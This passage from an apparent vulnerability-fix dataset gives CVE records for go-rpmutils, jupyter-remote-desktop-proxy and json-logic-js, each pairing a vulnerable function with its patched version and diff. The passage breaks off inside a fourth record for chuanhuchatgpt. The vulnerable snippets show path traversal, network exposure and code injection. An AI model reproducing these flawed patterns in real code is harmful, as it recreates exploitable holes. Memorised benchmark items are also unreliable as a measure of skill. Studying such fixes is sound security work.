directory."}}, "repo": "https://github.com/sassoftware/go-rpmutils", "patch_url": ["https://github.com/sassoftware/go-rpmutils/commit/a64058cf21b8aada501bba923c9aab66fb6febf0"], "programing_language": "Go", "vul_func": [{"id": "vul_go_211_1", "commit": "e314ffa", "file_path": "cpio/extract.go", "start_line": 42, "end_line": 149, "snippet": "func Extract(rs io.Reader, dest string) error {\n\tlinkMap := make(map[int][]string)\n\n\tstream := NewCpioStream(rs)\n\n\tfor {\n\t\tentry, err := stream.ReadNextEntry()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif entry.Header.filename == TRAILER {\n\t\t\tbreak\n\t\t}\n\n\t\ttarget := path.Join(dest, path.Clean(entry.Header.filename))\n\t\tparent := path.Dir(target)\n\n\t\t// Create the parent directory if it doesn't exist.\n\t\tif _, err := os.Stat(parent); os.IsNotExist(err) {\n\t\t\tif err := os.MkdirAll(parent, 0755); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\n\t\t// FIXME: Need a makedev implementation in go.\n\n\t\tswitch entry.Header.Mode() &^ 07777 {\n\t\tcase S_ISCHR:\n\t\t\tlogger.Debug(\"unpacking char device\")\n\t\t\t// FIXME: skipping due to lack of makedev.\n\t\t\tcontinue\n\t\tcase S_ISBLK:\n\t\t\tlogger.Debug(\"unpacking block device\")\n\t\t\t// FIXME: skipping due to lack of makedev.\n\t\t\tcontinue\n\t\tcase S_ISDIR:\n\t\t\tlogger.Debug(\"unpacking dir\")\n\t\t\tm := os.FileMode(entry.Header.Mode()).Perm()\n\t\t\tif err := os.Mkdir(target, m); err != nil && !os.IsExist(err) {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISFIFO:\n\t\t\tlogger.Debug(\"unpacking named 
pipe\")\n\t\t\tif err := fileutil.Mkfifo(target, uint32(entry.Header.Mode())); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISLNK:\n\t\t\tlogger.Debug(\"unpacking symlink\")\n\t\t\tbuf := make([]byte, entry.Header.c_filesize)\n\t\t\tif _, err := entry.payload.Read(buf); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := os.Symlink(string(buf), target); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISREG:\n\t\t\tlogger.Debug(\"unpacking regular file\")\n\t\t\t// save hardlinks until after the taget is written\n\t\t\tif entry.Header.c_nlink > 1 && entry.Header.c_filesize == 0 {\n\t\t\t\tlogger.Debug(\"regular file is a hard link\")\n\t\t\t\tl, ok := linkMap[entry.Header.c_ino]\n\t\t\t\tif !ok {\n\t\t\t\t\tl = make([]string, 0)\n\t\t\t\t}\n\t\t\t\tl = append(l, target)\n\t\t\t\tlinkMap[entry.Header.c_ino] = l\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// FIXME: Set permissions on files when creating.\n\t\t\tf, err := os.Create(target)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\twritten, err := io.Copy(f, entry.payload)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif written != int64(entry.Header.c_filesize) {\n\t\t\t\tlogger.Debugf(\"written: %d, filesize: %d\", written, entry.Header.c_filesize)\n\t\t\t\treturn fmt.Errorf(\"short write\")\n\t\t\t}\n\t\t\tif err := f.Close(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Create hardlinks after the file content is written.\n\t\t\tif entry.Header.c_nlink > 1 && entry.Header.c_filesize > 0 {\n\t\t\t\tl, ok := linkMap[entry.Header.c_ino]\n\t\t\t\tif !ok {\n\t\t\t\t\treturn fmt.Errorf(\"hardlinks missing\")\n\t\t\t\t}\n\n\t\t\t\tfor _, t := range l {\n\t\t\t\t\tif err := os.Link(target, t); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"unknown file mode 0%o for %s\",\n\t\t\t\tentry.Header.c_mode, entry.Header.filename)\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_211_1", "commit": "a64058cf21b8aada501bba923c9aab66fb6febf0", "file_path": "cpio/extract.go", "start_line": 45, "end_line": 158, "snippet": "func Extract(rs io.Reader, dest string) error {\n\tdest = filepath.Clean(filepath.FromSlash(dest))\n\tlinkMap := make(map[int][]string)\n\n\tstream := NewCpioStream(rs)\n\n\tfor {\n\t\tentry, err := stream.ReadNextEntry()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif entry.Header.filename == TRAILER {\n\t\t\tbreak\n\t\t}\n\n\t\t// sanitize path\n\t\ttarget := path.Clean(entry.Header.filename)\n\t\tfor strings.HasPrefix(target, \"../\") {\n\t\t\ttarget = target[3:]\n\t\t}\n\t\ttarget = filepath.Join(dest, filepath.FromSlash(target))\n\t\tif !strings.HasPrefix(target, dest+string(filepath.Separator)) && dest != target {\n\t\t\t// this shouldn't happen due to the sanitization above but always check\n\t\t\treturn fmt.Errorf(\"invalid cpio path %q\", entry.Header.filename)\n\t\t}\n\t\t// Create the parent directory if it doesn't exist.\n\t\tparent := filepath.Dir(target)\n\t\tif err := os.MkdirAll(parent, 0755); err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// FIXME: Need a makedev implementation in go.\n\n\t\tswitch entry.Header.Mode() &^ 07777 {\n\t\tcase S_ISCHR:\n\t\t\tlogger.Debug(\"unpacking char device\")\n\t\t\t// FIXME: skipping due to lack of makedev.\n\t\t\tcontinue\n\t\tcase S_ISBLK:\n\t\t\tlogger.Debug(\"unpacking block device\")\n\t\t\t// FIXME: skipping due to lack of makedev.\n\t\t\tcontinue\n\t\tcase S_ISDIR:\n\t\t\tlogger.Debug(\"unpacking dir\")\n\t\t\tm := 
os.FileMode(entry.Header.Mode()).Perm()\n\t\t\tif err := os.Mkdir(target, m); err != nil && !os.IsExist(err) {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISFIFO:\n\t\t\tlogger.Debug(\"unpacking named pipe\")\n\t\t\tif err := fileutil.Mkfifo(target, uint32(entry.Header.Mode())); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISLNK:\n\t\t\tlogger.Debug(\"unpacking symlink\")\n\t\t\tbuf := make([]byte, entry.Header.c_filesize)\n\t\t\tif _, err := entry.payload.Read(buf); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := os.Symlink(string(buf), target); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase S_ISREG:\n\t\t\tlogger.Debug(\"unpacking regular file\")\n\t\t\t// save hardlinks until after the taget is written\n\t\t\tif entry.Header.c_nlink > 1 && entry.Header.c_filesize == 0 {\n\t\t\t\tlogger.Debug(\"regular file is a hard link\")\n\t\t\t\tl, ok := linkMap[entry.Header.c_ino]\n\t\t\t\tif !ok {\n\t\t\t\t\tl = make([]string, 0)\n\t\t\t\t}\n\t\t\t\tl = append(l, target)\n\t\t\t\tlinkMap[entry.Header.c_ino] = l\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// FIXME: Set permissions on files when creating.\n\t\t\tf, err := os.Create(target)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\twritten, err := io.Copy(f, entry.payload)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif written != int64(entry.Header.c_filesize) {\n\t\t\t\tlogger.Debugf(\"written: %d, filesize: %d\", written, entry.Header.c_filesize)\n\t\t\t\treturn fmt.Errorf(\"short write\")\n\t\t\t}\n\t\t\tif err := f.Close(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Create hardlinks after the file content is written.\n\t\t\tif entry.Header.c_nlink > 1 && entry.Header.c_filesize > 0 {\n\t\t\t\tl, ok := linkMap[entry.Header.c_ino]\n\t\t\t\tif !ok {\n\t\t\t\t\treturn fmt.Errorf(\"hardlinks missing\")\n\t\t\t\t}\n\n\t\t\t\tfor _, t := range l {\n\t\t\t\t\tif err := os.Link(target, t); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"unknown file mode 0%o for %s\",\n\t\t\t\tentry.Header.c_mode, entry.Header.filename)\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/cpio/extract.go\n+++ b/cpio/extract.go\n@@ -1,4 +1,5 @@\n func Extract(rs io.Reader, dest string) error {\n+\tdest = filepath.Clean(filepath.FromSlash(dest))\n \tlinkMap := make(map[int][]string)\n \n \tstream := NewCpioStream(rs)\n@@ -13,16 +14,21 @@\n \t\t\tbreak\n \t\t}\n \n-\t\ttarget := path.Join(dest, path.Clean(entry.Header.filename))\n-\t\tparent := path.Dir(target)\n-\n+\t\t// sanitize path\n+\t\ttarget := path.Clean(entry.Header.filename)\n+\t\tfor strings.HasPrefix(target, \"../\") {\n+\t\t\ttarget = target[3:]\n+\t\t}\n+\t\ttarget = filepath.Join(dest, filepath.FromSlash(target))\n+\t\tif !strings.HasPrefix(target, dest+string(filepath.Separator)) && dest != target {\n+\t\t\t// this shouldn't happen due to the sanitization above but always check\n+\t\t\treturn fmt.Errorf(\"invalid cpio path %q\", entry.Header.filename)\n+\t\t}\n \t\t// Create the parent directory if it doesn't exist.\n-\t\tif _, err := os.Stat(parent); os.IsNotExist(err) {\n-\t\t\tif err := os.MkdirAll(parent, 0755); err != nil {\n-\t\t\t\treturn err\n-\t\t\t}\n+\t\tparent := filepath.Dir(target)\n+\t\tif err := os.MkdirAll(parent, 0755); err != nil {\n+\t\t\treturn err\n \t\t}\n-\n \t\t// FIXME: Need a makedev implementation in go.\n \n \t\tswitch entry.Header.Mode() &^ 07777 {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-32428", "cve_description": "Jupyter Remote 
Desktop Proxy allows you to run a Linux Desktop on a JupyterHub. jupyter-remote-desktop-proxy was meant to rely on UNIX sockets readable only by the current user since version 3.0.0, but when used with TigerVNC, the VNC server started by jupyter-remote-desktop-proxy was still accessible via the network. This vulnerability does not affect users who have TurboVNC as the vncserver executable. This issue is fixed in 3.0.1.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/jupyterhub/jupyter-remote-desktop-proxy", "patch_url": ["https://github.com/jupyterhub/jupyter-remote-desktop-proxy/commit/7dd54c25a4253badd8ea68895437e5a66a59090d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_287_1", "commit": "5a46ef7", "file_path": "jupyter_remote_desktop_proxy/setup_websockify.py", "start_line": 8, "end_line": 46, "snippet": "def setup_websockify():\n    vncserver = which('vncserver')\n    if not vncserver:\n        raise RuntimeError(\n            \"vncserver executable not found, please install a VNC server\"\n        )\n\n    # {unix_socket} is expanded by jupyter-server-proxy\n    vnc_args = [vncserver, '-rfbunixpath', '{unix_socket}']\n\n    xstartup = os.getenv(\"JUPYTER_REMOTE_DESKTOP_PROXY_XSTARTUP\")\n    if not xstartup and not os.path.exists(os.path.expanduser('~/.vnc/xstartup')):\n        xstartup = os.path.join(HERE, 'share/xstartup')\n    if xstartup:\n        vnc_args.extend(['-xstartup', xstartup])\n\n    vnc_command = shlex.join(\n        vnc_args\n        + [\n            '-verbose',\n            '-fg',\n            '-geometry',\n            '1680x1050',\n            '-SecurityTypes',\n            'None',\n        ]\n    )\n\n    return {\n        'command': ['/bin/sh', '-c', f'cd {os.getcwd()} && {vnc_command}'],\n        'timeout': 30,\n        'new_browser_window': True,\n        # We want the launcher entry to point to /desktop/, not to /desktop-websockify/\n        # /desktop/ is the user facing URL, while /desktop-websockify/ now *only* serves\n        # websockets.\n        \"launcher_entry\": {\"title\": \"Desktop\", \"path_info\": \"desktop\"},\n        \"unix_socket\": True,\n        \"raw_socket_proxy\": True,\n    }"}], "fix_func": [{"id": "fix_py_287_1", "commit": "7dd54c25a4253badd8ea68895437e5a66a59090d", "file_path": "jupyter_remote_desktop_proxy/setup_websockify.py", "start_line": 8, "end_line": 65, "snippet": "def setup_websockify():\n    vncserver = which('vncserver')\n    if not vncserver:\n        raise RuntimeError(\n            \"vncserver executable not found, please install a VNC server\"\n        )\n\n    # TurboVNC and TigerVNC share the same origin and both use a Perl script\n    # as the executable vncserver. We can determine if vncserver is TigerVNC\n    # by searching tigervnc string in the Perl script.\n    #\n    # The content of the vncserver executable can differ depending on how\n    # TigerVNC and TurboVNC has been distributed. 
Below are files known to be\n    # read in some situations:\n    #\n    # - https://github.com/TigerVNC/tigervnc/blob/v1.13.1/unix/vncserver/vncserver.in\n    # - https://github.com/TurboVNC/turbovnc/blob/3.1.1/unix/vncserver.in\n    #\n    with open(vncserver) as vncserver_file:\n        vncserver_file_text = vncserver_file.read().casefold()\n    is_turbovnc = \"turbovnc\" in vncserver_file_text\n\n    # {unix_socket} is expanded by jupyter-server-proxy\n    vnc_args = [vncserver, '-rfbunixpath', \"{unix_socket}\", \"-rfbport\", \"-1\"]\n    if is_turbovnc:\n        # turbovnc doesn't handle being passed -rfbport -1, but turbovnc also\n        # defaults to not opening a TCP port which is what we want to ensure\n        vnc_args = [vncserver, '-rfbunixpath', \"{unix_socket}\"]\n\n    xstartup = os.getenv(\"JUPYTER_REMOTE_DESKTOP_PROXY_XSTARTUP\")\n    if not xstartup and not os.path.exists(os.path.expanduser('~/.vnc/xstartup')):\n        xstartup = os.path.join(HERE, 'share/xstartup')\n    if xstartup:\n        vnc_args.extend(['-xstartup', xstartup])\n\n    vnc_command = shlex.join(\n        vnc_args\n        + [\n            '-verbose',\n            '-fg',\n            '-geometry',\n            '1680x1050',\n            '-SecurityTypes',\n            'None',\n        ]\n    )\n\n    return {\n        'command': ['/bin/sh', '-c', f'cd {os.getcwd()} && {vnc_command}'],\n        'timeout': 30,\n        'new_browser_window': True,\n        # We want the launcher entry to point to /desktop/, not to /desktop-websockify/\n        # /desktop/ is the user facing URL, while /desktop-websockify/ now *only* serves\n        # websockets.\n        \"launcher_entry\": {\"title\": \"Desktop\", \"path_info\": \"desktop\"},\n        \"unix_socket\": True,\n        \"raw_socket_proxy\": True,\n    }"}], "vul_patch": "--- a/jupyter_remote_desktop_proxy/setup_websockify.py\n+++ b/jupyter_remote_desktop_proxy/setup_websockify.py\n@@ -5,8 +5,27 @@\n \"vncserver executable not found, please install a VNC server\"\n )\n \n+ # TurboVNC and TigerVNC share the same origin and both use a Perl script\n+ # as the executable vncserver. We can determine if vncserver is TigerVNC\n+ # by searching tigervnc string in the Perl script.\n+ #\n+ # The content of the vncserver executable can differ depending on how\n+ # TigerVNC and TurboVNC has been distributed. Below are files known to be\n+ # read in some situations:\n+ #\n+ # - https://github.com/TigerVNC/tigervnc/blob/v1.13.1/unix/vncserver/vncserver.in\n+ # - https://github.com/TurboVNC/turbovnc/blob/3.1.1/unix/vncserver.in\n+ #\n+ with open(vncserver) as vncserver_file:\n+ vncserver_file_text = vncserver_file.read().casefold()\n+ is_turbovnc = \"turbovnc\" in vncserver_file_text\n+\n # {unix_socket} is expanded by jupyter-server-proxy\n- vnc_args = [vncserver, '-rfbunixpath', '{unix_socket}']\n+ vnc_args = [vncserver, '-rfbunixpath', \"{unix_socket}\", \"-rfbport\", \"-1\"]\n+ if is_turbovnc:\n+ # turbovnc doesn't handle being passed -rfbport -1, but turbovnc also\n+ # defaults to not opening a TCP port which is what we want to ensure\n+ vnc_args = [vncserver, '-rfbunixpath', \"{unix_socket}\"]\n \n xstartup = os.getenv(\"JUPYTER_REMOTE_DESKTOP_PROXY_XSTARTUP\")\n if not xstartup and not os.path.exists(os.path.expanduser('~/.vnc/xstartup')):\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-4329", "cve_description": "A vulnerability, which was classified as critical, has been found in json-logic-js 2.0.0. The issue affects the operator-dispatch logic in the file logic.js. The manipulation leads to command injection. Upgrading to version 2.0.1 addresses this issue. The patch is identified as c1dd82f5b15d8a553bb7a0cfa841ab8a11a9c227. 
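The jupyter-remote-desktop-proxy fix above (CVE-2025-32428) distinguishes TigerVNC from TurboVNC by reading the vncserver Perl script, then passes TigerVNC `-rfbport -1` so no TCP listener is opened. A rough standalone sketch of that detection, assuming the same flags as the patch (the surrounding scaffolding is hypothetical):

    from shutil import which

    def vnc_args_for(unix_socket: str) -> list:
        vncserver = which("vncserver")
        if vncserver is None:
            raise RuntimeError("vncserver executable not found")
        # Both servers ship vncserver as a Perl script; TurboVNC's mentions
        # "turbovnc", which is how the upstream patch tells them apart.
        with open(vncserver) as f:
            is_turbovnc = "turbovnc" in f.read().casefold()
        args = [vncserver, "-rfbunixpath", unix_socket]
        if not is_turbovnc:
            # TigerVNC listens on TCP unless told not to; TurboVNC already
            # defaults to no TCP listener and does not accept -rfbport -1.
            args += ["-rfbport", "-1"]
        return args
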
It is recommended to upgrade the affected component. VDB-222266 is the identifier assigned to this vulnerability.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/jwadhams/json-logic-js", "patch_url": ["https://github.com/jwadhams/json-logic-js/commit/c1dd82f5b15d8a553bb7a0cfa841ab8a11a9c227"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_186_1", "commit": "17e9fed", "file_path": "logic.js", "start_line": 205, "end_line": 361, "snippet": " jsonLogic.apply = function(logic, data) {\n // Does this array contain logic? Only one way to find out.\n if (Array.isArray(logic)) {\n return logic.map(function(l) {\n return jsonLogic.apply(l, data);\n });\n }\n // You've recursed to a primitive, stop!\n if ( ! jsonLogic.is_logic(logic) ) {\n return logic;\n }\n\n var op = jsonLogic.get_operator(logic);\n var values = logic[op];\n var i;\n var current;\n var scopedLogic;\n var scopedData;\n var filtered;\n var initial;\n\n // easy syntax for unary operators, like {\"var\" : \"x\"} instead of strict {\"var\" : [\"x\"]}\n if ( ! Array.isArray(values)) {\n values = [values];\n }\n\n // 'if', 'and', and 'or' violate the normal rule of depth-first calculating consequents, let each manage recursion as needed.\n if (op === \"if\" || op == \"?:\") {\n /* 'if' should be called with a odd number of parameters, 3 or greater\n This works on the pattern:\n if( 0 ){ 1 }else{ 2 };\n if( 0 ){ 1 }else if( 2 ){ 3 }else{ 4 };\n if( 0 ){ 1 }else if( 2 ){ 3 }else if( 4 ){ 5 }else{ 6 };\n\n The implementation is:\n For pairs of values (0,1 then 2,3 then 4,5 etc)\n If the first evaluates truthy, evaluate and return the second\n If the first evaluates falsy, jump to the next pair (e.g, 0,1 to 2,3)\n given one parameter, evaluate and return it. (it's an Else and all the If/ElseIf were false)\n given 0 parameters, return NULL (not great practice, but there was no Else)\n */\n for (i = 0; i < values.length - 1; i += 2) {\n if ( jsonLogic.truthy( jsonLogic.apply(values[i], data) ) ) {\n return jsonLogic.apply(values[i+1], data);\n }\n }\n if (values.length === i+1) {\n return jsonLogic.apply(values[i], data);\n }\n return null;\n } else if (op === \"and\") { // Return first falsy, or last\n for (i=0; i < values.length; i+=1) {\n current = jsonLogic.apply(values[i], data);\n if ( ! 
jsonLogic.truthy(current)) {\n return current;\n }\n }\n return current; // Last\n } else if (op === \"or\") {// Return first truthy, or last\n for (i=0; i < values.length; i+=1) {\n current = jsonLogic.apply(values[i], data);\n if ( jsonLogic.truthy(current) ) {\n return current;\n }\n }\n return current; // Last\n } else if (op === \"filter\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n\n if ( ! Array.isArray(scopedData)) {\n return [];\n }\n // Return only the elements from the array in the first argument,\n // that return truthy when passed to the logic in the second argument.\n // For parity with JavaScript, reindex the returned array\n return scopedData.filter(function(datum) {\n return jsonLogic.truthy( jsonLogic.apply(scopedLogic, datum));\n });\n } else if (op === \"map\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n\n if ( ! Array.isArray(scopedData)) {\n return [];\n }\n\n return scopedData.map(function(datum) {\n return jsonLogic.apply(scopedLogic, datum);\n });\n } else if (op === \"reduce\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n initial = typeof values[2] !== \"undefined\" ? values[2] : null;\n\n if ( ! Array.isArray(scopedData)) {\n return initial;\n }\n\n return scopedData.reduce(\n function(accumulator, current) {\n return jsonLogic.apply(\n scopedLogic,\n {current: current, accumulator: accumulator}\n );\n },\n initial\n );\n } else if (op === \"all\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n // All of an empty set is false. Note, some and none have correct fallback after the for loop\n if ( ! scopedData.length) {\n return false;\n }\n for (i=0; i < scopedData.length; i+=1) {\n if ( ! jsonLogic.truthy( jsonLogic.apply(scopedLogic, scopedData[i]) )) {\n return false; // First falsy, short circuit\n }\n }\n return true; // All were truthy\n } else if (op === \"none\") {\n filtered = jsonLogic.apply({filter: values}, data);\n return filtered.length === 0;\n } else if (op === \"some\") {\n filtered = jsonLogic.apply({filter: values}, data);\n return filtered.length > 0;\n }\n\n // Everyone else gets immediate depth-first recursion\n values = values.map(function(val) {\n return jsonLogic.apply(val, data);\n });\n\n\n // The operation is called with \"data\" bound to its \"this\" and \"values\" passed as arguments.\n // Structured commands like % or > can name formal arguments while flexible commands (like missing or merge) can operate on the pseudo-array arguments\n // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions/arguments\n if (typeof operations[op] === \"function\") {\n return operations[op].apply(data, values);\n } else if (op.indexOf(\".\") > 0) { // Contains a dot, and not in the 0th position\n var sub_ops = String(op).split(\".\");\n var operation = operations;\n for (i = 0; i < sub_ops.length; i++) {\n // Descending into operations\n operation = operation[sub_ops[i]];\n if (operation === undefined) {\n throw new Error(\"Unrecognized operation \" + op +\n \" (failed at \" + sub_ops.slice(0, i+1).join(\".\") + \")\");\n }\n }\n\n return operation.apply(data, values);\n }\n\n throw new Error(\"Unrecognized operation \" + op );\n };"}], "fix_func": [{"id": "fix_js_186_1", "commit": "c1dd82f", "file_path": "logic.js", "start_line": 205, "end_line": 362, "snippet": " jsonLogic.apply = function(logic, data) {\n // Does this array contain logic? 
Only one way to find out.\n if (Array.isArray(logic)) {\n return logic.map(function(l) {\n return jsonLogic.apply(l, data);\n });\n }\n // You've recursed to a primitive, stop!\n if ( ! jsonLogic.is_logic(logic) ) {\n return logic;\n }\n\n var op = jsonLogic.get_operator(logic);\n var values = logic[op];\n var i;\n var current;\n var scopedLogic;\n var scopedData;\n var filtered;\n var initial;\n\n // easy syntax for unary operators, like {\"var\" : \"x\"} instead of strict {\"var\" : [\"x\"]}\n if ( ! Array.isArray(values)) {\n values = [values];\n }\n\n // 'if', 'and', and 'or' violate the normal rule of depth-first calculating consequents, let each manage recursion as needed.\n if (op === \"if\" || op == \"?:\") {\n /* 'if' should be called with a odd number of parameters, 3 or greater\n This works on the pattern:\n if( 0 ){ 1 }else{ 2 };\n if( 0 ){ 1 }else if( 2 ){ 3 }else{ 4 };\n if( 0 ){ 1 }else if( 2 ){ 3 }else if( 4 ){ 5 }else{ 6 };\n\n The implementation is:\n For pairs of values (0,1 then 2,3 then 4,5 etc)\n If the first evaluates truthy, evaluate and return the second\n If the first evaluates falsy, jump to the next pair (e.g, 0,1 to 2,3)\n given one parameter, evaluate and return it. (it's an Else and all the If/ElseIf were false)\n given 0 parameters, return NULL (not great practice, but there was no Else)\n */\n for (i = 0; i < values.length - 1; i += 2) {\n if ( jsonLogic.truthy( jsonLogic.apply(values[i], data) ) ) {\n return jsonLogic.apply(values[i+1], data);\n }\n }\n if (values.length === i+1) {\n return jsonLogic.apply(values[i], data);\n }\n return null;\n } else if (op === \"and\") { // Return first falsy, or last\n for (i=0; i < values.length; i+=1) {\n current = jsonLogic.apply(values[i], data);\n if ( ! jsonLogic.truthy(current)) {\n return current;\n }\n }\n return current; // Last\n } else if (op === \"or\") {// Return first truthy, or last\n for (i=0; i < values.length; i+=1) {\n current = jsonLogic.apply(values[i], data);\n if ( jsonLogic.truthy(current) ) {\n return current;\n }\n }\n return current; // Last\n } else if (op === \"filter\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n\n if ( ! Array.isArray(scopedData)) {\n return [];\n }\n // Return only the elements from the array in the first argument,\n // that return truthy when passed to the logic in the second argument.\n // For parity with JavaScript, reindex the returned array\n return scopedData.filter(function(datum) {\n return jsonLogic.truthy( jsonLogic.apply(scopedLogic, datum));\n });\n } else if (op === \"map\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n\n if ( ! Array.isArray(scopedData)) {\n return [];\n }\n\n return scopedData.map(function(datum) {\n return jsonLogic.apply(scopedLogic, datum);\n });\n } else if (op === \"reduce\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n initial = typeof values[2] !== \"undefined\" ? values[2] : null;\n\n if ( ! Array.isArray(scopedData)) {\n return initial;\n }\n\n return scopedData.reduce(\n function(accumulator, current) {\n return jsonLogic.apply(\n scopedLogic,\n {current: current, accumulator: accumulator}\n );\n },\n initial\n );\n } else if (op === \"all\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n // All of an empty set is false. Note, some and none have correct fallback after the for loop\n if ( ! scopedData.length) {\n return false;\n }\n for (i=0; i < scopedData.length; i+=1) {\n if ( ! 
jsonLogic.truthy( jsonLogic.apply(scopedLogic, scopedData[i]) )) {\n return false; // First falsy, short circuit\n }\n }\n return true; // All were truthy\n } else if (op === \"none\") {\n filtered = jsonLogic.apply({filter: values}, data);\n return filtered.length === 0;\n } else if (op === \"some\") {\n filtered = jsonLogic.apply({filter: values}, data);\n return filtered.length > 0;\n }\n\n // Everyone else gets immediate depth-first recursion\n values = values.map(function(val) {\n return jsonLogic.apply(val, data);\n });\n\n\n // The operation is called with \"data\" bound to its \"this\" and \"values\" passed as arguments.\n // Structured commands like % or > can name formal arguments while flexible commands (like missing or merge) can operate on the pseudo-array arguments\n // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions/arguments\n if (operations.hasOwnProperty(op) && typeof operations[op] === \"function\") {\n return operations[op].apply(data, values);\n } else if (op.indexOf(\".\") > 0) { // Contains a dot, and not in the 0th position\n var sub_ops = String(op).split(\".\");\n var operation = operations;\n for (i = 0; i < sub_ops.length; i++) {\n\n if (!operation.hasOwnProperty(sub_ops[i])) {\n throw new Error(\"Unrecognized operation \" + op +\n \" (failed at \" + sub_ops.slice(0, i+1).join(\".\") + \")\");\n }\n // Descending into operations\n operation = operation[sub_ops[i]];\n }\n\n return operation.apply(data, values);\n }\n\n throw new Error(\"Unrecognized operation \" + op );\n };"}], "vul_patch": "--- a/logic.js\n+++ b/logic.js\n@@ -136,18 +136,19 @@\n // The operation is called with \"data\" bound to its \"this\" and \"values\" passed as arguments.\n // Structured commands like % or > can name formal arguments while flexible commands (like missing or merge) can operate on the pseudo-array arguments\n // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions/arguments\n- if (typeof operations[op] === \"function\") {\n+ if (operations.hasOwnProperty(op) && typeof operations[op] === \"function\") {\n return operations[op].apply(data, values);\n } else if (op.indexOf(\".\") > 0) { // Contains a dot, and not in the 0th position\n var sub_ops = String(op).split(\".\");\n var operation = operations;\n for (i = 0; i < sub_ops.length; i++) {\n- // Descending into operations\n- operation = operation[sub_ops[i]];\n- if (operation === undefined) {\n+\n+ if (!operation.hasOwnProperty(sub_ops[i])) {\n throw new Error(\"Unrecognized operation \" + op +\n \" (failed at \" + sub_ops.slice(0, i+1).join(\".\") + \")\");\n }\n+ // Descending into operations\n+ operation = operation[sub_ops[i]];\n }\n \n return operation.apply(data, values);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-7962", "cve_description": "An arbitrary file read vulnerability exists in gaizhenbiao/chuanhuchatgpt version 20240628 due to insufficient validation when loading prompt template files. An attacker can read any file that matches specific criteria using an absolute path. The file must not have a .json extension and, except for the first line, every other line must contain commas. 
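The json-logic-js fix above (CVE-2021-4329) replaces bare property lookups with hasOwnProperty() checks so operator names such as "constructor" cannot reach inherited properties and inject code. A Python sketch of the equivalent dispatch discipline — an explicit operator table with a membership test — is shown below; it is illustrative, not a port of the library:

    OPERATIONS = {
        "+": lambda a, b: a + b,
        "cat": lambda *parts: "".join(map(str, parts)),
    }

    def apply_op(op: str, args: list):
        # Membership test against an explicit table: names like "constructor"
        # or "__proto__" simply are not keys, so nothing inherited is reachable.
        if op not in OPERATIONS:
            raise ValueError("Unrecognized operation " + op)
        return OPERATIONS[op](*args)

    print(apply_op("+", [1, 2]))   # 3
    # apply_op("constructor", []) # raises ValueError instead of escaping
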
